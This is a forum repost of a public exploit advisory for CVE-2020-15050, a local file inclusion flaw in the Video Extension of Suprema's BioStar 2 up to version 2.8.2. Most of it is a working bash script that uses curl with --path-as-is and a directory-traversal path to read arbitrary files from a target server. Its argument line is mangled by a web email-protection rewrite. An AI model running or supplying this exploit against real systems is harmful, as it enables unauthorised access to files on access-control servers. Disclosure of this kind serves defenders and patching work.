Bio Star 2.8.2 Local File Inclusion

#209
Topic created · 1 Posts · 0 Views
  • Bio Star version 2.8.2 suffers from a local file inclusion vulnerability.
    MD5 | 27371df2c5b87c59458e1241e0ee2306
    Download

    # Exploit Title: Bio Star 2.8.2 - Local File Inclusion  
    # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)  
    # Google Dork: N/A  
    # Date of Exploit Release: 2020-07-13  
    # Exploit Author: SITE Team  
    # Vendor Homepage: https://www.supremainc.com/en/main.asp  
    # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp  
    # Version: Bio Star 2, Video Extension up to version 2.8.2  
    # Tested on: Windows  
    # CVE : CVE-2020-15050  
    #!/bin/bash  
    # Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit  
    # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)  
    # Google Dork: N/A  
    # Date of Exploit Release: 13/7/2020  
    # Exploit Author: SITE Team  
    # Vendor Homepage: https://www.supremainc.com/en/main.asp  
    # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp  
    # Version: Bio Star 2, Video Extension up to version 2.8.1  
    # Tested on: Windows  
    # CVE : CVE-2020-15050  
    echo "*********** SITE TEAM *********************"  
    echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"  
    echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi  *********************"  
    if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"  
    echo "*******************************************"  
    else  
    args=("[[email protected]](/cdn-cgi/l/email-protection)")  
    curl -X GET --path-as-is -k  ${args[0]}${args[1]}  
    fi  
    

    Source: packetstormsecurity.com

Log in to reply